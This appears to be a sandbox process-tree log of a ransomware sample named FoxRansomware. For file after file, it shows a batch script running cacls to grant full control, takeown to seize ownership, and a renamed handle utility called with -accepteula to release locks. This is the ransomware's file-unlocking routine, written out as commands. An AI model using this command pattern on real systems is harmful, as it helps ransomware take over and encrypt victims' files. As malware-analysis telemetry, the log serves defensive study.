C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win64.xml"3⤵PID:2284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner3⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013Win64.xml" -nobanner4⤵PID:5264
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml""2⤵PID:5208
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml" /E /G Admin:F /C3⤵PID:5036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win64.xml"3⤵PID:5928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner3⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftSkypeForBusiness2016Win64.xml" -nobanner4⤵PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:2584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:2540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:6024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:3792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵PID:1396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "settings.dat" -nobanner3⤵PID:2536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "settings.dat" -nobanner4⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2""2⤵PID:2840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C3⤵PID:5708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2"3⤵PID:3980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "settings.dat.LOG2" -nobanner3⤵PID:2792
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "settings.dat.LOG2" -nobanner4⤵PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""2⤵PID:3016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C3⤵PID:5080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000G.bin" -nobanner3⤵PID:3760
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000G.bin" -nobanner4⤵PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""2⤵PID:3504
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C3⤵PID:5368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"3⤵PID:5504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000R.bin" -nobanner3⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000R.bin" -nobanner4⤵PID:5284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""2⤵PID:2952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C3⤵PID:5788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"3⤵PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000015.bin" -nobanner3⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000015.bin" -nobanner4⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f04cdd19-51d0-4625-8337-45f358d5d451.1.etl""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f04cdd19-51d0-4625-8337-45f358d5d451.1.etl" /E /G Admin:F /C3⤵PID:4740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f04cdd19-51d0-4625-8337-45f358d5d451.1.etl"3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "UpdateSessionOrchestration.f04cdd19-51d0-4625-8337-45f358d5d451.1.etl" -nobanner3⤵PID:1352
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "UpdateSessionOrchestration.f04cdd19-51d0-4625-8337-45f358d5d451.1.etl" -nobanner4⤵PID:6112
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""2⤵PID:4432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C3⤵PID:4788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"3⤵PID:3864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000006H.bin" -nobanner3⤵PID:4192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000006H.bin" -nobanner4⤵PID:3488
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:4248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵PID:3296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "superbar.png" -nobanner3⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "superbar.png" -nobanner4⤵PID:5820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:4664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:5128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵PID:3524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "resource.xml" -nobanner3⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "resource.xml" -nobanner4⤵PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""2⤵PID:5800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C3⤵PID:5052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"3⤵
- Modifies file permissions
PID:5988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftLync2010.xml" -nobanner3⤵PID:2168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftLync2010.xml" -nobanner4⤵PID:420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""2⤵PID:5456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C3⤵PID:5960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"3⤵PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner4⤵PID:1600
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""2⤵PID:3848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C3⤵PID:3692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"3⤵PID:5176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner3⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner4⤵PID:4492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:1832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:5080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:2932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:4880
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl""2⤵PID:1452
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl" /E /G Admin:F /C3⤵PID:5168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl"3⤵PID:116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl" -nobanner3⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "UpdateSessionOrchestration.9597c6cc-2302-4ae3-a665-e851ed2a5ca1.1.etl" -nobanner4⤵PID:5680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5872
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""2⤵PID:2216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C3⤵PID:5744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000075.bin" -nobanner3⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000075.bin" -nobanner4⤵PID:4868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""2⤵PID:5932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C3⤵PID:2720
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"3⤵PID:2864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000083.bin" -nobanner3⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000083.bin" -nobanner4⤵PID:1352
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""2⤵PID:4888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C3⤵PID:5312
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"3⤵PID:396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000009F.bin" -nobanner3⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000009F.bin" -nobanner4⤵PID:4192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""2⤵PID:4432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C3⤵PID:5704
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"3⤵PID:5320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000AL.bin" -nobanner3⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000AL.bin" -nobanner4⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""2⤵PID:5484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C3⤵PID:5156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"3⤵PID:3668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "000000B1.bin" -nobanner3⤵PID:3492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "000000B1.bin" -nobanner4⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:2596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"3⤵PID:5768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "settings.dat" -nobanner3⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "settings.dat" -nobanner4⤵PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "settings.dat" -nobanner3⤵PID:5100
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "settings.dat" -nobanner4⤵PID:3560
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin" /E /G Admin:F /C3⤵PID:4260
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin"3⤵
- Modifies file permissions
PID:6020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "00000009.bin" -nobanner3⤵PID:1380
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "00000009.bin" -nobanner4⤵PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\iuFAQ08L.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin""2⤵PID:5636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin" /E /G Admin:F /C3⤵PID:5660
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin"3⤵
- Modifies file permissions
PID:5232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c FCcth9iY.exe -accepteula "0000000N.bin" -nobanner3⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\FCcth9iY.exeFCcth9iY.exe -accepteula "0000000N.bin" -nobanner4⤵PID:1896
-
-
-
